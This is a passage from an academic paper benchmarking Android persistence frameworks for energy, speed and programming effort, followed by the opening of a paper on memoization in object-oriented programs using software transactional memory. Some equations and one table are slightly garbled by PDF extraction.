energy consumption. The operation numbers are obtained by hooking into the SQLite operation interfaces provided by the Android System Library. For those interfaces provided for a certain type of database operation, we mark them as “Read” or “Write”; for those interfaces provided for general SQL execution, we search for certain keywords (e.g., insert, update, select, and delete), in the SQL strings, and further mark them as “Read” or “Write”. - **Energy consumption** The energy consumption can be calculated using the real-time current of the Android device’s battery. We use the Monsoon power monitor (0000) to monitor the current and voltage of the device’s battery, as shown in Fig. 1. As the output voltage of a smartphone’s battery remains stable, only the current and time are required to calculate the energy consumed. Eq. (1) is used to calculate the overall energy consumption, where I is the average current (mA), and t is the time window (ms). Micro-ampere-hour is a unit of electric charge, commonly used to measure the capacity of electric batteries. \[ E = \frac{I \times t}{36000/\text{hour}} \] (1) The equation shows that the energy consumption is proportional to the execution time, as well as to the current required by the device’s hardware (e.g., CPU, memory, network, and hard disk). For the persistence frameworks, the differences of energy consumption reflect not only the execution time differences, but also the different CPU workload and hard disk R/W operations required to process database operations. - **Uncommented line of codes (ULOC)** ULOC reflects the required effort, defined as the amount of code a programmer has to write to use a persistence framework. For its simplicity, ULOC was used to express programming effort in earlier studies (e.g., Lavazza et al., 2016). As all the test suites are implemented only in Java and SQL, the ULOC metric is reflective of the relative programming effort incurred by using a framework. Next, we introduce the input parameters for different benchmarks. For the DaCapo benchmark, we want to explore the performance boundary of different persistence frameworks under a heavy workload. Therefore, we vary the amount of total transactions to a large scale, and record the overall time taken and energy consumed. For the micro benchmark, we study the “initialize”, “insert”, “select”, “update”, and “delete” invocations in turn. We change the number of transactions for the last four invocations, so for the “select”, “update” and “delete” invocations, the amount of data records also changes. Therefore, the input parameters for the micro benchmark is a set of two parameters: - [NUMBER OF TRANSACTIONS, AMOUNT OF DATA RECORDS]. 4.4. Experimental hardware and tools To measure the energy consumed by a device, its battery must be removed to connect to the power meter’s hardware. Unfortunately, a common trend in the design of Android smartphones --- 1 All the code used in our experiments can be downloaded from [https://github.com/AmberPoo/PEPBench](https://github.com/AmberPoo/PEPBench). makes removable batteries a rare exception. The most recently made device we have available for our experiments is an LG LS740 smartphone, with 1GB of RAM, 8GB of ROM and 1.2GHz quad-core Qualcomm Snapdragon 400 processor (Singh and Jain, 2014), running Android 4.4.2 KitKat operating system. Although the device was released in 2014 and runs at a lower CPU frequency than the devices in common use today, the Android hardware design, at least with respect to the performance parameters measured, has not experienced a major transformation, thus not compromising the relevance of our findings. We execute all experiments as the only load on the device’s OS. To minimize the interference from other major sources of energy consumption, we set the screen brightness to the minimal level and turn off the WiFi/GPS/Data modules. As the CPU frequency takes time to normalize once the device exits the sleep mode, we run each benchmark 5 times within the same environment, with the first two runs to warm up the system and wait until the background energy consumption rate stabilizes. The reported data is calculated as the average of the last 3 runs, with the differences of the three runs of the same benchmark being not larger than 5%. To understand the Dalvik VM method invocations, we use Traceview, an Android profiler that makes it possible to explore the impact of programming abstractions on the overall performance. Unfortunately, only the Android ORM benchmark is suitable for this exploration, due to the Traceview scalability limitations. 5. Study results In this section, we report and analyze our experimental results. 5.1. Experiments with the android ORM benchmark In this group of experiments, we study how the types of operation (insert, update, select, and delete) and the variations on the number of transactions impact energy consumption and execution time with different frameworks using the micro benchmark. The experimental results for each type of persistence operation are presented in Figs. 2 and 3. The first row of Fig. 2(a) and (b) shows the energy consumption and execution time of the “insert” database invocation, and Fig. 2(c) shows that of the “update”, “select”, and “delete” database invocations, respectively. Fig. 3(a)–(d) show the database read and write operations of these four invocations, respectively. The results show that the persistence frameworks differ in terms of their respective energy consumption, execution time, read, and write measurements. Next, we compare the results by operation: Insert We observe that DBFlow takes the longest time to perform the insert operation, while ActiveAndroid takes the second longest, with the remaining frameworks showing comparable performance levels. DBFlow performs the highest number of database operations, a measurement that explains its long execution time. Different from other frameworks, DBFlow requires that a database read operation be performed before a database write operation to ensure that the-record-to-insert has not been already inserted into the database. Besides, the runtime trace reveals that interactions with the cache triggered by inserts in ActiveAndroid are expensive, costing 62% of the overall execution time. By contrast, greenDAO exhibits the shortest execution time, due to its simple but efficient batch insert encapsulation, as shown in Table 1. Update We observe that the cost of the Java Realm update is several orders of magnitude larger than that of other frameworks, especially as the number of transactions grows. Several reasons can explain the high performance costs of the update operation in Java Realm. As one can see in Table 1, Java Realm lacks support for batch updates. Besides, the update procedure invokes the underlying library method, TableView.size(), which operates on a memory-hosted list of entities and costs more than 98% of the overall execution time. The execution time of Sugar ORM is also high, due to it having the highest number of read and write operations. Sugar ORM needs to search for the target object before updating it. This search procedure is designed as the recursive SugarRecord.find() method, which costs 96% of the overall execution time. Select and delete For the select and delete operations, we observe that Sugar ORM (1) exhibits the worst performance in terms of execution time and energy consumption; (2) performs the highest number of database operations, as it executes an extra query for each atomic operation. The inefficiency of the select and delete operations in Sugar ORM stems from the presence of these extra underlying operations. However, as discussed above, the bulk of the execution time is spent in the recursive find method. ORM-Lite, greenDAO, DBFlow, Paper, and Android SQLite show comparable performance levels when executing these two operations. Table 2 sums up the rankings of each persistence framework w.r.t. different database operation invocations. We also measure the Uncommented Lines of Code (ULOC) for implementing all the basic database operation invocations for each persistence framework and include this metric in the table. From Table 2 and our analysis above, we can draw the following conclusions: 1. By adding up the rankings of different operations, we can rank these frameworks in terms of their overall performance: Android SQLite > greenDAO > DBFlow > ORM-Lite > Java Realm > Paper > Sugar ORM > ActiveAndroid, where “−” means “having better performance than”, and “=−” means “having similar performance with”. 2. Considering the programming effort of implementing all database operations using different frameworks, DBFlow and Paper require less programming effort than the other frameworks. 3. When considering the balance of programming effort and performance, DBFlow can be generally recommended for developing database-oriented mobile application with a standard database operation/schema complexity. 4. Sugar ORM would not be an optimal choice when the dominating operations in a mobile app are select or delete, DBFlow would not be optimal when the dominating operation is insert, while Java Realm would not be optimal when the dominating operation is update. 5.2. Experiments with the dacapo benchmark In this group of experiments, we use the DaCapo benchmark to study how the energy consumption and execution time of each framework changes in relation to the number of executed bank transactions. The benchmark comes with a total of 41,971 records, so in our experiments we differ the number of bank transactions. In our measurements, we vary the number of bank transactions over the following values: 40, 120, 200, 280, 360, 440, 520, 600, 800, 1000, 1500. The total number of transactions is the sum of basic bank transactions, as listed in Table 3. Each transaction comprises a complex set of database operations. The key transactions in each run are “New Order”, “Payment by Name”, and “Payment by ID”, which mainly execute the “query” and “update” operations. In our experiments, “New Order” itself takes 42.5% of the entire number of transactions. Fig. 2. Energy/execution time for android ORM benchmark with alternative persistence frameworks. Table 2 Comparison of persistence frameworks in the android ORM experiment. <table> <thead> <tr> <th>Compared Item</th> <th>SQLite</th> <th>DBFlow</th> <th>greenDAO</th> <th>ORMLite</th> <th>Realm</th> <th>Paper</th> <th>Sugar</th> <th>ActiveAndroid</th> </tr> </thead> <tbody> <tr> <td>ULOC</td> <td>306</td> <td>181</td> <td>241</td> <td>326</td> <td>313</td> <td>190</td> <td>226</td> <td>253</td> </tr> <tr> <td>Initialization ranking</td> <td>6</td> <td>1</td> <td>5</td> <td>7</td> <td>3</td> <td>4</td> <td>2</td> <td>8</td> </tr> <tr> <td>Insert ranking</td> <td>2</td> <td>8</td> <td>1</td> <td>4</td> <td>3</td> <td>5</td> <td>6</td> <td>7</td> </tr> <tr> <td>Update ranking</td> <td>1</td> <td>2</td> <td>3</td> <td>4</td> <td>5</td> <td>6</td> <td>8</td> <td>7</td> </tr> <tr> <td>Select ranking</td> <td>4</td> <td>2</td> <td>1</td> <td>3</td> <td>7</td> <td>6</td> <td>8</td> <td>5</td> </tr> <tr> <td>Delete ranking</td> <td>14</td> <td>15</td> <td>15</td> <td>21</td> <td>26</td> <td>28</td> <td>30</td> <td>31</td> </tr> <tr> <td>Summed up ranking</td> <td></td> <td></td> <td></td> <td></td> <td></td> <td></td> <td></td> <td></td> </tr> </tbody> </table> Table 3 Number of operations for each transaction type with 1500 overall transactions. <table> <thead> <tr> <th>Transaction type</th> <th>Operation amount</th> </tr> </thead> <tbody> <tr> <td>New order rollback</td> <td>8</td> </tr> <tr> <td>Order status by ID</td> <td>26</td> </tr> <tr> <td>Order status by name</td> <td>42</td> </tr> <tr> <td>Stock level</td> <td>59</td> </tr> <tr> <td>Delivery schedule</td> <td>62</td> </tr> <tr> <td>Payment by ID</td> <td>245</td> </tr> <tr> <td>Payment by name</td> <td>391</td> </tr> <tr> <td>New order</td> <td>667</td> </tr> </tbody> </table> In Fig. 4, (a) and (b) show the energy/exeuction time and read/write operations of the DaCapo Initialization, respectively. Fig. 4(c) shows the energy consumption for each transaction number, and Fig. 4(d) shows the execution time for each transaction number. Fig. 4(e) and (f) show the read/write operation number, respectively. As the write operation number of ActiveDroid, greenDao, OrmLite, Sugar ORM and SQLite are very close (e.g., when the transaction amount is 1500, the number of write operation are 18209, 18200, 18205, 18211, 18212 respectively), we only present the average operation number of these five frameworks in Fig. 4(e). Similarly, we use the line in pink to present Sugar ORM/greenDao, and the line in green for SQLite/ActiveDroid in Fig. 4(f). Table 3 shows the number of operations performed by each transaction. The dominant database operation in the initialization phase is insert, and (a) shows the performance levels consistent with those seen in the Android ORM benchmark for the same opera- Fig. 4. Energy/execution time/read and write for DaCapo benchmark with alternative persistence frameworks. (For interpretation of the references to color in this figure, the reader is referred to the web version of this article.) From Fig. 4, we observe that Java Realm and Sugar ORM have the longest execution time when executing the transactions whose major database operation is update (e.g., “New order”, “New order rollback”, “Payment by name”, and “Payment by ID”). This conclusion is consistent with that derived from the Android ORM update experiments shown in Section 5.1. Android SQLite takes rather long to execute, as it involves database aggregation (e.g., sum, and the table queried had 30,060 records) and arithmetic operations (e.g. field − 1) in the select clause. Meanwhile, as ActiveAndroid only uses the raw SQL manipulation interface for complex update operations (Table 1), it exhibits the best performance, albeit at the cost of additional programming effort. From Fig. 4(c)–(f) and Table 4 we conclude that: 1. ActiveAndroid offers the overall best performance for all DaCapo transactions. It shows the best performance for the most common transactions, at the cost of additional programming. effort. Besides, its execution invokes the smallest number of database operations, due to its caching mechanism. 2. Sugar ORM and Java Realm have the longest execution time, in line with the Android ORM benchmark’s results discussed in Section 5.3. 3. greenDAO’s performance is in the middle, while requiring the lowest programming effort, taking 24.5% fewer uncommented lines of code to implement than the other frameworks. 4. DBFlow takes more time and energy to execute than does ActiveAndroid; it also requires a higher programming effort than greenDAO does. Nevertheless, it strikes a good balance between the required programming effort and the resulting execution efficiency. 5.3. Relationship of energy consumption, execution time and DB operations We also discuss the relationship between energy consumption, execution time, and database operations. We combine all the previous collected read/write, execution time and energy consumption data from all the benchmarks. As shown in Fig. 5(a), the number of total database operations (Read and Write) has a dominating impact on both the execution time and energy consumption: (1) as the number of data operations increases so usually do the execution time and energy consumption; (2) the execution time and energy consumption are also impacted by other factors (e.g., the complexity of data operations, the framework’s implementation design choices, etc.). Meanwhile, as shown in Fig 5(b), there is a significant positive relationship between the time consumption and the energy consumption, with \( r(142) = 0.99, p < 0.001 \). Hence, the longer a database task executes, the more energy it ends up consuming. 6. Numerical model The experiments above show that for the same application scenario different frameworks exhibit different execution time, energy consumption, and programming effort. However, to derive practical benefits from these insights, mobile app developers need a way to quantify these trade-offs for any combination of an application scenario and a persistence framework. To that end, we propose a numerical model PEP (Performance, Energy consumption, and Programming Effort) for mobile app developers to systematically evaluate the suitability of persistence frameworks. 6.1. Design of the PEP model Our numerical model follows a commonly used technique for evaluating software products called a utility index (Christodoulou et al., 2009). Products with equivalent functionality possess multidimensional feature-sets, and a utility index is a score that quantifies the overall performance of each product, allowing the products to be compared with each other. As our experiments show, the utility of persistence frameworks is closely related to application features (e.g., data schema complexity, operations involved, data records manipulated, database operations executed). Therefore, it is only meaningful to compare the persistence frameworks within the context of a certain application scenario. Here, we use \( p \) to denote an application with a set of features. Let \( \mathcal{O} = \{1, 2, 3 \ldots \} \) be a set of frameworks. Let \( E_{\sigma}(p), \forall \sigma \in \mathcal{O} \) denote the energy consumption of different implementations of \( p \) using various frameworks \( \sigma \), while \( T_{\sigma}(p), \forall \sigma \in \mathcal{O} \) denotes the execution time. As the energy consumption and the execution time of database operations correlate linearly in our experimental results, we use the Euclidean distance of a two dimensional vector to calculate the overall performance, which can be denoted as \[ P_{\sigma, \sigma'} = \sqrt{T_{\sigma}(p)^2 + E_{\sigma}(p)^2}, \forall \sigma, \sigma' \in \mathcal{O}. \] The programming effort is represented by the ULOC, and here we use \( L_{\sigma}(p), \forall \sigma \in \mathcal{O} \) to denote the programming effort of different implementations of the project \( p \) using different persistence frameworks. We consider both the framework’s performance and programming effort to compute the utility index \( I_{\sigma}(p) \): \[ I_{\sigma}(p) = \frac{\min(p_{\sigma}(p), \forall \sigma \in \mathcal{O})}{p_{\sigma}(p)} + \frac{L_{\sigma}(p)}{\min(L_{\sigma}(p), \forall \sigma \in \mathcal{O})}, \forall \sigma \in \mathcal{O} \] The equation’s first part, \( \min(p_o(p), V_o(C)) \), compares the performance of a mobile app implemented by means of the persistence framework \( o \), and the implementation that has the best performance. The equation’s second part, \( \min(L_o(p), V_o(C)) \), compares the programming effort between an implementation \( o(p) \) and the implementation that requires the minimal programming effort. When the utility index \( \tau \) of a framework \( o \)-based implementation is close to 1, the implementation is likely to offer acceptable performance, with low programming effort. Consider the following example that demonstrates how to calculate the utility index. If for an app \( p \), Android SQLite might provide the best performance, while the greenDAO-based implementation consumes twice the energy and takes twice the execution time. Therefore, the performance index of \( P_{\text{greenDAO}}(p) \) is 0.5. On the other hand, the greenDAO-based implementation might require the lowest programming effort, as measured by the ULOC metric. Therefore, the implementation complexity index of \( L_{\text{greenDAO}}(p) \) is 1. Thus, the overall utility index is \( 0.5/1 = 0.5 \). Application developers apply dissimilar standards to judge the trade-offs between performance and programming effort. Some developers focus solely on performance, while others may prefer the shortest time-to-market. We introduce \( \tau \) to express these preferences. \[ L_o(p) = \frac{\min(p_o(p), V_o(C))}{\min(L_o(p), V_o(C))} \tau \quad (3) \] where \( \tau > 0 \). When \( \tau \rightarrow 1 \), the larger \( \tau \) is, the more weight is assigned to the programming effort target. Otherwise, when \( \tau < 1 \), the lower \( \tau \) is, the more weight is assigned to the performance target. ### 6.2. Evaluating the benchmarks To provide an insight into how the persistence frameworks evaluated in this article fit different application scenarios, we apply the PEP model to the Android ORM and DaCapo benchmarks. We consider typical low and high transaction volumes, respectively, for each benchmark. Specifically, for the Android ORM benchmark, we evaluate two sets of input, 1025 transactions and 20,025 transactions. For the DaCapo benchmark, we evaluate two sets of input, 40 transactions and 1500 transactions. For each input set, we assign \( \tau \) to 0.5, 1, and 1.5, in turn, to show whether the developers are willing to invest extra effort to improve performance. Specifically, when \( \tau = 0.5 \), the developer’s main concern is performance; when \( \tau = 1 \), the balance of performance and programming effort is desired; when \( \tau = 1.5 \), the developer wishes to minimize programming effort. Table 5 shows the calculated index values of the persistence frameworks for all cases. From the results presented in Table 5, we can draw several conclusions: (1) For the DaCapo benchmark or similar mobile apps with heavy data processing functionality and complicated data structures, DBFlow represents the best performance/programming effort trade-off. When the number of data operations is very high, ActiveAndroid should also be considered, as it provides the best execution performance, especially when the programmer is not as concerned about minimizing the programming effort; (2) For the Android ORM benchmark or similar mobile apps with less complicated data structures, when the number of data operations is small, the top choice is Paper, as this framework reduces the programming effort while providing high execution efficiency. However, when the number of data operations surpasses a certain threshold (over 10K simple data operations), the execution performance of Paper experiences a sudden drop due to scalability issues. In such cases, greenDAO and Android SQLite would be the recommended options. In the following discussion, we use hypothetical use cases to demonstrate how the generated guidelines can help mobile app developers pick the best framework for the application scenario in hand. Consider four cases: (1) a developer wants to persist the user’s application-specific color scheme preferences; (2) a team of developers wants to develop a production-level contact book application; (3) an off-line map navigation application needs to store hundreds of MBs of data, comprising map fragments, points of interests, and navigation routines; (4) an MP3 player app needs to retrieve the artist’s information based on some features of the MP3 being played. For use case 1, the main focus during the development procedure is to lower the programming effort, while the data structures and the number of data operations are simple and small. Therefore, for this use case, we would recommend using Paper. For use case 2, the main focus is to improve the responsiveness and efficiency, as the potential data volume can get quite large. Given that minimizing the programming effort is deprioritized, we would recommend using greenDAO or Android SQLite. For use case 3, complex data structures are required to be able to handle the potentially large data volumes, while maintaining quick responsiveness and high efficiency is expected of navigation apps. Therefore, we would recommend using ActiveAndroid. For use case 4, the main application’s feature is playing MP3s, and the ability to retrieve the artist’s data instantaneously is non-essential. To save the programming effort of this somewhat auxiliary feature, we would recommend using DBFlow. ### 7. Threats to validity Next, we discuss the threats to the validity of our experimental results. Although in designing our experimental evaluation, we tried to perform as an objective assessment as possible, our design choices could have certainly affected the validity and applicability of our conclusions. The key external threat to validity is our choice of the hardware devices, Android version, and profiling equipment. Specifically, we conducted our experiments with an LG mobile phone, with 1.2 GHz quad-core Qualcomm Snapdragon 400 processor, running Android 4.4.2 KitKat, profiled with the Monsoon Power Monitor. Even though these experimental parameters are representative of the Android computing ecosystem, changing any of these parameters could have affected some outcomes of our experiments. The key internal threat to validity are our design choices for structuring the database and the persistence application functionality. Specifically, while our Android ORM benchmark set explores the object features of Android persistence frameworks, the original DaCapo (Blackburn et al., 2006) H2 benchmark manipulates relational database structures directly, without stress-testing the object-oriented persistence frameworks around it. To re-target DaCapo to focus on persistence frameworks rather than the JVM alone, we adapted the benchmark to make use of transparent persistence as a means of accessing its database-related functionality. Nevertheless, the relatively large scale of data volume, with the select and update operations bank transactions dominating the execution, this benchmark is representative of a large class of database application systems, but not all of them. Besides, we have not tested our PEP model on real-world applications. Hence, it is not confirmed yet how accurate the model would be for such applications. 8. Conclusions In this paper, we present a systematic study of popular Android ORM/DB persistence frameworks. We first compare and contrast the frameworks to present an overview of their features and capabilities. Then we present our experimental design of two sets of benchmarks, used to explore the execution time, energy consumption, and programming effort of these frameworks in different application scenarios. We analyze our experimental results in the context of the analyzed frameworks’ features and capabilities. Finally, we propose a numerical model to help guide mobile developers in their decision-making process when choosing a persistence framework for a given application scenario. To the best of our knowledge, this research is the first step to better understand the trade-offs between the execution time, energy efficiency, and programming effort of Android persistence frameworks. As a future work direction, we plan to apply the PEP model presented above to real-world applications, in order to assess its accuracy and applicability. Acknowledgment This research is supported by the National Science Foundation through the Grants CCF-1649583 and CCF-1717065. The authors would like to thank the anonymous reviewers, whose insightful comments helped improve this article. Supplementary material Supplementary material associated with this article can be found, in the online version, at doi:10.1016/j.jss.2018.08.038. References Zheng Song is a Ph.D student in the computer science department of Virginia Tech. His research interests include mobile computing and software engineering. Junjie Cheng is now a 4th year undergraduate student in the computer science department of Virginia Tech. Jing Pu holds a master's degree in computer science from Virginia Tech. Eli Tilevich is an associate professor in the department of computer science of Virginia Tech. His research interests include systems end of software engineering; distributed systems and middleware; automated software transformation; mobile applications; energy efficient software; CS education; music informatics.
{"Source-Url": "https://par.nsf.gov/servlets/purl/10096820", "len_cl100k_base": 11214, "olmocr-version": "0.1.50", "pdf-total-pages": 13, "total-fallback-pages": 0, "total-input-tokens": 64730, "total-output-tokens": 14589, "length": "2e13", "weborganizer": {"__label__adult": 0.00039124488830566406, "__label__art_design": 0.0002357959747314453, "__label__crime_law": 0.0002593994140625, "__label__education_jobs": 0.0007967948913574219, "__label__entertainment": 6.115436553955078e-05, "__label__fashion_beauty": 0.0001621246337890625, "__label__finance_business": 0.0002586841583251953, "__label__food_dining": 0.0002765655517578125, "__label__games": 0.0005083084106445312, "__label__hardware": 0.0013170242309570312, "__label__health": 0.0004448890686035156, "__label__history": 0.00022292137145996096, "__label__home_hobbies": 7.671117782592773e-05, "__label__industrial": 0.00030231475830078125, "__label__literature": 0.0002143383026123047, "__label__politics": 0.00020897388458251953, "__label__religion": 0.0003464221954345703, "__label__science_tech": 0.015655517578125, "__label__social_life": 7.617473602294922e-05, "__label__software": 0.00494384765625, "__label__software_dev": 0.97216796875, "__label__sports_fitness": 0.0002636909484863281, "__label__transportation": 0.0005016326904296875, "__label__travel": 0.0001838207244873047}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 62585, 0.03311]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 62585, 0.33069]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 62585, 0.87284]], "google_gemma-3-12b-it_contains_pii": [[0, 4454, false], [4454, 12044, null], [12044, 19621, null], [19621, 23128, null], [23128, 29220, null], [29220, 36314, null], [36314, 36411, null], [36411, 39031, null], [39031, 40251, null], [40251, 44551, null], [44551, 50357, null], [50357, 59438, null], [59438, 62585, null]], "google_gemma-3-12b-it_is_public_document": [[0, 4454, true], [4454, 12044, null], [12044, 19621, null], [19621, 23128, null], [23128, 29220, null], [29220, 36314, null], [36314, 36411, null], [36411, 39031, null], [39031, 40251, null], [40251, 44551, null], [44551, 50357, null], [50357, 59438, null], [59438, 62585, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 62585, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 62585, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 62585, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 62585, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 62585, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 62585, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 62585, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 62585, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 62585, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 62585, null]], "pdf_page_numbers": [[0, 4454, 1], [4454, 12044, 2], [12044, 19621, 3], [19621, 23128, 4], [23128, 29220, 5], [29220, 36314, 6], [36314, 36411, 7], [36411, 39031, 8], [39031, 40251, 9], [40251, 44551, 10], [44551, 50357, 11], [50357, 59438, 12], [59438, 62585, 13]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 62585, 0.07983]]}
olmocr_science_pdfs
2024-11-29
2024-11-29
db539ef13a392f201254437d285bdc042a2dc860
Memoization of Methods Using Software Transactional Memory to Track Internal State Dependencies Hugo Rito INESC-ID Lisboa/Technical University of Lisbon hugo.rito@ist.utl.pt João Cachopo INESC-ID Lisboa/Technical University of Lisbon joao.cachopo@ist.utl.pt Abstract Memoization is a well-known technique for improving the performance of a program, but it has been confined mostly to functional programming, where no mutable state or side-effects exist. Most object-oriented programs, however, are built around objects with an internal state that is mutable over the course of the program. Therefore, the execution of methods often depends on the internal state of some objects or produces side-effects, thus making the application of memoization impractical for object-oriented programs in general. In this paper, we propose an extended memoization approach that builds on the support provided by a Software Transactional Memory (STM) to identify both internal state dependencies and side-effects, hence removing many of the limitations of traditional memoization. We describe the Automatic Transaction-Oriented Memoization (ATOM) system, a thread-safe implementation of our memoization model that requires minimal learning effort from programmers, while offering a simple and customizable interface. Additionally, we describe a memoization advisory system that collects per-method performance statistics with the ultimate goal of aiding programmers in their task of choosing which methods are profitable to memoize. We argue that ATOM is the first memoization system adequate to the unique characteristics of object-oriented programs and we show how memoization can be implemented almost for free in systems that use an STM, presenting the reasons why this synergy can be particularly useful in transactional contexts. We show the usefulness of memoizing object-oriented programs by applying memoization to the STMBench7 benchmark, a standard benchmark developed for evaluating STM implementations. The memoized version of the benchmark shows up to a 14-fold increase in the throughput for a read-dominated workload. Categories and Subject Descriptors D.1.5 [PROGRAMMING TECHNIQUES]: Object-Oriented Programming General Terms Performance Keywords Memoization, Object-Oriented Programming, Software Transactional Memory 1. Introduction Memoization [11] is a well-known technique for improving the performance of functional programs in a transparent way, without changing their semantics. The key idea behind memoization is that we may speedup the execution of a function if we maintain a cache of previous computations and return results from that cache instead of computing the results again. Because the result returned by a pure function depends only on the arguments supplied to the function, it is sufficient to use those arguments as the cache-key. That simple approach, however, does not work in general for object-oriented programs. In the object-oriented programming paradigm, objects maintain internal state that influence the objects’ behaviors and, in general, this state changes over time. This differentiating characteristic of object-oriented programs hinders the application of memoization because the outcome of a method often depends not only on the arguments supplied to the method but also on the internal state of objects, which must be, therefore, taken into consideration when building the cache-key. Objects with mutable internal state raise problems to concurrent programs, also. In a context where concurrent threads may read from and write to shared objects, programmers need to ensure that threads observe the state of shared objects and perform actions on that state in a consistent manner. To tackle this problem, much of the recent work on concurrent programming explores the idea of using a Software Transactional Memory (STM) [14], which introduces the notion of atomic actions, or transactions, into the programming model. With an STM, programmers specify which operations must execute atomically, leaving to the STM the responsibility of providing the intended semantics, while maintaining as much parallelism and concurrency as possible. Typically, this is accomplished by intercepting and registering all accesses to (transactional) memory locations in a per-transaction log, which is used to validate transactions and to ensure atomicity and isolation between threads. In this paper, we present a solution to the problem of applying memoization to object-oriented programs that is based on the information collected by a software transactional memory runtime. We assume that every mutable memory location is under the control of an STM, meaning that a program may need to be transactified before we apply our memoization solution to it. The details of how a program may be transactified, however, are out of the scope of this paper: We will assume that either the underlying runtime system provides already an STM-based support for the execution of the program, or the program was correctly transactified before (either manually, or automatically through a transactification tool such as JaSPEx [2]). Our proposal was implemented as the Automatic Transaction-Oriented Memoization (ATOM) system, a Java implementation of our memoization model that extends the Java Versioned STM (JVSTM). To the best of our knowledge, ATOM is the first automatic memoization system that addresses the unique characteristics of object-oriented programs because: (1) it allows memoizing methods that depend on the internal state of objects (rather than only pure functions that depend only on their arguments), (2) it prevents errors in memoizing unintended methods, (3) it allows memoizing methods that have side-effects, and (4) it offers a memoization advisory tool that aids programmers in choosing which methods are profitable to memoize. In the next section we review what memoization is and show the pitfalls of applying memoization in object-oriented programs. We briefly introduce the concept of Software Transactional Memory in Section 3, with special emphasis on the Java Versioned STM. In Section 4, we present the core ideas of our work, and then, in Section 5, we describe its implementation. In Section 6, we present some results obtained from the STMBench7 benchmark. In Section 7, we discuss related work. and, finally, in Section 8, we draw some conclusions and discuss future work. 2. Memoization Memoization is a function-level optimization technique that improves the performance of programs in exchange of extra memory space: To avoid future repeated work, each memoized function is augmented with a cache that stores the results of previous computations. A performance increase is possible if it is faster to search the cache for a match than to reexecute the original function, and, of course, there is a cache hit (meaning that the result stored in the cache is returned). To apply memoization it is essential that we define what are the relevant values for a computation, because only doing so will we be able to build a cache-key that allows a correct classification of computations as repeated or not. We classify a particular value as relevant for a computation’s result if the result of the computation may be different when the aforementioned value changes. Likewise, we define the list containing all the relevant values that are significant for a computation as the relevant state of said computation. In functional contexts it is simple to build the relevant state because the result of a function is fully defined by the function’s arguments. Thus, the list of arguments received as input by the memoized function may be used as the cache-key. As we will see, the same approach may not apply to methods in object-oriented contexts. 2.1 The pitfalls of applying memoization in object-oriented programs To introduce the problems of applying memoization to object-oriented programs and later illustrate our approach, we shall use a minimalist example of an application from the banking domain. In particular, suppose that the application deals only with two types of entities: accounts and clients. Accounts have a current balance, which corresponds to some monetary amount in some particular monetary currency. Clients may have any number of accounts, can deposit money to any account, but can issue withdrawals only from accounts that they own. These operations change the respective account’s current balance in accordance with the amount deposited or withdrawn. Clients may also query the bank for their total balance—that is, the sum of the balance of all the accounts that they own. This minimalist example is representative of typical object-oriented programs, where some objects have an internal state that may change over time (in this case, both the account’s and the client’s state may change). In the following, we give a brief overview of the problems that this mutable state poses to memoization. 2.1.1 The problem of depending on the internal state of objects Consider the implementation of the Client and the Account classes shown in Listing 1. Furthermore, assume that, for performance reasons, we want to memoize the getTotalBalance method. ```java class Account { long balance; } class Client { Set<Account> accounts; long getTotalBalance() { long total = 0; for (Account acc : accounts) { total += acc.balance; } return total; } } ``` Listing 1. Java implementation of the classes Client and Account. To do it safely, we need to identify what may possibly change a client’s total balance—that is, what are the relevant values for the output of the method getTotalBalance. A client’s total balance may change every time the client opens a new account, closes an account, or changes the balance of one of its accounts. Thus, we need to reexecute the method getTotalBalance every time that there is a change on the content of the slot accounts or on the value of the slot balance of one of the Account instances contained in the accounts slot. From this example it is clear that the approach followed in functional programs, of using the function’s list of arguments as the cache-key, cannot be directly applied in object-oriented programs, because the list of relevant values encompasses not only the list of arguments supplied to the memoized method, but also values read from the internal state of objects. Knowing that the list of arguments is not suited to classify computations as repeated or not, a naive approach would be to include in the cache-key the content of the set accounts and the balance of each Account instance contained within the accounts set. In fact, in this simple example that may solve the problem. Yet, in the general case, of more complex methods where the set of fields accessed is much larger and the relevant state depends on which execution path is taken or on what other methods are called, it is unfeasible to determine manually the correct set of fields to use in the cache-key. Another problem with internal state dependencies is that it is not simple to store in the cache information regarding the locations from where relevant values were retrieved, so that, in future reexecutions, we can inspect those cached locations to check if they still hold the same value. 2.1.2 The problem of side-effects Without risking a semantic change, we can skip the execution of a method only if the method is referentially transparent. A method is referentially transparent if calling the method has the exact same effect as replacing the method call with its return value. This means that memoization is not applicable to methods with side-effects, such as, for instance, methods that do I/O or that change the internal state of some object. The problem is that methods with side-effects are common in object-oriented programs and represent a tangible risk when memoized: Skipping their execution after a cache hit may lead to an inconsistent system state. This impossibility directly influences how memoization is done in imperative systems because, unlike what happens in functional environments, it is no longer safe to memoize any method of the system. Thus, to guarantee correct system semantics, we need to classify methods as producing side-effects or not. In polymorphic environments and in the presence of deep and complex call-chains, doing this classification manually is time-consuming, hard, and error-prone. Moreover, even assuming that we could identify methods without side-effects, nothing prevents future iterations of the system to introduce side-effects, either directly or indirectly, on methods’ executions that had none before. So, after each change to the system, we have to revise all memoized methods to look for potential side-effects. In practice, this means that, without support from the memoization tool, we will never be sure that a method’s execution that produces side-effects will not be skipped due to being inadvertently memoized or being called inside a memoized method. Thus, an adequate memoization tool would remove this burden from the programmers shoulders, by automatically identifying methods with side-effects. Once we know which methods have side-effects, it is easy to prevent the memoization of those methods. Yet, if we allow only a reduced subset of the system to be memoized, this 